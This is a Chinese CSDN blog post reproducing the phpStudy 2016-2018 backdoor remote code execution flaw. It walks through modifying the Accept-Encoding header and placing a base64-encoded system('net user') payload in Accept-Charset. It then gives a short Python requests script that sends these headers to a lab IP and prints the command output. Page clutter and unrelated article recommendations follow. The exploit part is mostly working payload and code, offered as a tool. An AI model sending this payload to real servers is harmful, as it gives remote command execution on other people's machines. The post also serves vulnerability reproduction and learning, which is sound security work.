phpstudy_2016-2018_rce_hackdoor利用脚本

最新推荐文章于 2024-09-05 11:10:46 发布
最新推荐文章于 2024-09-05 11:10:46 发布
阅读量71 收藏
点赞数
分类专栏: 工具 文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52963334/article/details/133176544
版权

漏洞复现

phpstudy使用2016-2018版本,打开burpsuite中自带的浏览器访问phpinfo.php,将数据包发送到repeater模块

image-20230921104814230

漏洞验证

将Accept-Encoding字段中deflate前的空格删掉,如下
Accept-Encoding: gzip,deflate

添加Accept-Charset字段及内容,其中内容为system('命令');并进行base64编码。如下
Accept-Charset: c3lzdGVtKCduZXQgdXNlcicpOw==

image-20230921105337211

poc编写

#phpstudy_2016-2018_backdoor_rce
#简略版,无通用功能,只针对本漏洞
import requests

url="http://192.168.232.182/phpinfo/phpinfo.php"
headers ={
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "c3lzdGVtKCduZXQgdXNlcicpOw=="
}
req=requests.get(url=url,headers=headers)
html=req.content.decode("gbk")
offset = html.find("<!DOCTYPE html")

result = html[0:offset]
print(result)

image-20230922164028200

hutudamn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy2016 RCE漏洞验证
m0_56578216的博客
09-21 488
PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指软件中存在的一个远程代码执行漏洞。
phpStudy_2016-2018_RCE漏洞的检测利用脚本编写
weixin_44801963的博客
09-25 553
文章目录前言一、phpStudy_2016-2018存在什么漏洞二、EXP脚本编写1.目标存活检测2.漏洞触发3.完整代码总结 前言 本章主要针对phpStudy_2016-2018_RCE 漏洞编写EXP,复现该漏洞利用过程。文中内容涉及技术仅供个人学习参考。目前恶意植入该漏洞后门的犯罪者已伏法。 关于phpStudy_2016-2018_RCE 漏洞的详细介绍参考:https:// 一、phpStudy_2016-2018存在什么漏洞 phpStudy_2016-2018中存在RCE(remote.
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 1358
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
phpstudy_2016-2018_rce_backdoor后门漏洞复现
qq_58683895的博客
10-16 315
攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门。
phpStudy_2016-2018_RCE漏洞复现
weixin_44801963的博客
09-24 1585
文章目录前言一、phpStudy_2016-2018_RCE是什么二、漏洞存在的文件位置三、漏洞分析总结 前言 phpstudy漏洞在当时的影响还是蛮大的,所以决定对phpstudy存在的漏洞进行解析复现。 一、phpStudy_2016-2018_RCE是什么 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中20162018版本的phpstudy存在被黑客恶
PhpStudy BackDoor 2019漏洞
qq_45521281的博客
05-05 4340
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 基础介绍 事件背景 北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控...
PhpStudy_2016-2018_RCE漏洞复现
认真走好每一小步
07-22 147
PhpStudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可一键安装与搭建。其中20162018版本的phpStudy存在RCE漏洞,该漏洞直接可以远程执行系统命令。添加这两字段之前我们需要,将执行得命令进行Base64编码。#认真走好每一小步 请多指教。
phpstudy_2016.11.03.zip
03-14
phpstudy_2016.11.03这个压缩包中,包含了PHPStudy的主要组件和相关配置文件。用户解压后,可以找到phpStudy.exe主程序,通过双击运行,即可启动PHPStudy的控制台。控制台界面简洁明了,提供了如新建网站、修改...
phpStudy_2016.11.03后门版.zip
09-29
在本例中,"phpStudy_2016.11.03后门版.zip"是一个包含了可能含有恶意后门的PHP开发环境——phpStudy的版本。phpStudy是一款广泛使用的集成PHP开发环境,它集成了Apache服务器、MySQL数据库以及PHP等组件,方便...
phpStudy_2016.11.03.zip
04-24
mysql服务器高负载的情况下,必须采取一种措施给服务器减轻压力,减少服务器的I/O操作。一般采用的方法是优化sql操作语句,优化服务器的配置参数,从而提高服务器的性能。Mysql使用了几种内存缓存数据的策略来提高...
python】—— Python爬虫实战:爬取珠海市2011-2023年天气数据并保存为CSV文件
weixin_63106307的博客
09-05 722
本文将介绍如何使用Python编写一个简单的爬虫程序,以爬取珠海市2011年至2023年的天气数据,并将这些数据保存为CSV文件。
JS都有哪些操作数组的方法
ggq53219的博客
09-04 444
JavaScript 中操作数组的方法非常丰富,这些方法大致可以分为几类:创建和初始化数组、添加元素、删除元素、遍历数组、搜索元素、数组排序、数组映射和过滤等。
Transiting from CUDA to HIP (二)
weixin_44500921的博客
09-03 1227
为了解决这个问题,HIP(Heterogeneous-compute Interface for Portability)提供了一套宏定义,使得开发者可以编写可移植的代码,这些代码可以在 NVIDIA 的 CUDA 平台和 AMD 的 ROCm 平台上运行。是一个预定义的宏,用于指示当前编译的代码所针对的 NVIDIA GPU 的计算能力(Compute Capability)。为了正确编译包含 HIP 代码的文件,您需要确保编译器能够找到 HIP 的头文件,并且定义了正确的宏。
asyncio note
weixin_48232453的博客
09-03 818
python异步库asyncio入门
【hot100篇-python刷题记录】【数据流的中位数】
m0_73629042的博客
09-04 281
精简的代码总是难以琢磨。
访问数组索引时超出边界引发 ArrayIndexOutOfBoundsException
最新发布
Itmastergo的博客
09-05 867
在 Java 中,数组是一种数据结构,用于存储固定数量的同类型元素。数组中的元素可以是基本数据类型(如intcharfloat等)或引用类型(如String、自定义类等)。数组是一种线性表数据结构,也就是说,数组中的元素可以通过一个整数索引来访问。数组的索引从0开始,这意味着对于长度为n的数组,合法的索引范围是从0到n-1。// 创建一个长度为 5 的整型数组在上面的例子中,numbers是一个包含 5 个整型元素的数组,索引从0到4。数组的大小在创建时就已经固定,因此无法动态扩展。
jupter_notebook简单介绍以及安装使用
Ctrl+CV九段手
09-02 1584
Jupyter如果工作主要涉及数据科学、机器学习、教育或需要创建可共享的交互式文档,Jupyter Notebook 是一个很好的选择。如果需要一个全面的开发环境来构建和维护大型的 Python 应用程序,或者正在从事软件工程项目,PyCharm 会更适合哦!
计算机毕业设计选题推荐-任务管理系统-项目任务分配系统-Java/Python项目实战
IT研究室的博客
09-03 800
随着信息化技术的迅猛发展,各类企业和组织越来越依赖于高效的任务管理系统以保证其日常运营的顺利进行。根据IDC(国际数据公司)发布的报告显示,全球企业在数字化转型上的投入已达数千亿美元,其中相当一部分资金用于提升企业内部的管理效率。任务管理系统作为企业信息化的重要组成部分,能有效帮助企业分配、监控和反馈任务,从而提高工作效率。然而,尽管市场上已有多种任务管理系统,它们在功能、用户体验和适用性上存在显著差异。
CUDA编程08 - 并行编程思维
GPU全栈博主-程序哥
09-02 1111
到目前为止,我们集中于学习并行编程的实用知识,包括CUDA编程接口特性、GPU架构、性能优化技术、并行模式和应用案例研究。在本章中,我们将讨论更为抽象的概念。我们将并行编程概括为一种思维过程,即设计或选择并行算法,并将一个实际问题分解基本的工作单元,这些工作单元可以由所选的算法高效地执行。具备强大思维技能的程序员不仅会分析问题,还会转变实际问题的结构:哪些部分本质上是串行的,哪些部分适合并行执行,以及将前者的部分转移到后者所涉及的一些权衡。
phpstudy sql_mode=only_full_group_by -advertisement
04-30
phpstudy sql_mode=only_full_group_by -advertisement是指在phpstudy中设置MySQL的sql_mode为only_full_group_by,这个模式可以使MySQL在执行GROUP BY语句时更加严格。 在MySQL执行GROUP BY语句时,会将相同的行分组并统计,但有时在分组的字段中可能有一些非空的空值,这时MySQL在默认情况下会将这些空值也视作相同的值进行分组并统计,这可能会导致统计结果出现错误。 而only_full_group_by模式可以在分组时排除空值,只对真正有值的字段进行分组和统计,这样可以确保统计结果的正确性。 然而,启用only_full_group_by模式会使MySQL对语句执行更多的检查和计算,降低了查询的效率,因此在一些MySQL版本中默认关闭了这个模式。如果需要启用,需要手动设置sql_mode为包含only_full_group_by的值。 至于-advertisement部分,可能是意味着这是一条非广告的信息或公告。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值